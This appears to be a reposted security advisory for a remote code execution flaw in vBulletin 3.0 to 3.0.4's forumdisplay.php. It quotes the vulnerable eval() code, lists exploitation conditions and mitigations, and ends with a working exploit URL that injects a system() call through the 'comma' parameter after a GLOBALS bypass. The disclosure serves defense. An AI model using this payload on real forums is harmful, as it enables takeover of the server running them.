----------------
vBulletin version 3.0 up to and including version 3.0.4
Immune systems:
----------------
vBulletin version 3.0.5
vBulletin version 3.0.6
Vulnerable code in forumdisplay.php :
#############################################################
if ($vboptions[''showforumusers''])
{
.
.
.
.
if ($bbuserinfo[''userid''])
{
.
.
.
.
$comma = '', '';
}
.
.
.
.
while ($loggedin = $DB_site->fetch_array($forumusers))
{
.
.
.
eval(''$activeusers .= "'' . $comma . fetch_template(''forumdisplay_loggedinuser'')
. ''";''); <<==== (Vuln)
$comma = '', '';
.
.
}
.
.
}
#############################################################
字串8
Conditions:
----------------
1st condition : $vboptions[''showforumusers''] == True , the admin must set
showforumusers ON in vbulletin options.
2nd condition : $bbuserinfo[''userid''] == 0 , you must be an visitor/guest
.
3rd condition : $DB_site->fetch_array($forumusers) == True , when you
visit the forums, it must has at least one user show the forum.
4th condition : magic_quotes_gpc must be OFF
SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
init.php by secret array GLOBALS[]=1 ;)))
Solutions:
----------------
* Disable showforumusers in vbulletin options .
* add the next line before if ($vboptions[''showforumusers''])
$comma = '''';
Exploit:
----------------
example :
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system(''id'')."
文章来源地址:http://www.hackhome.com/html/wlcl/wlaq/2006/0610/26615.html
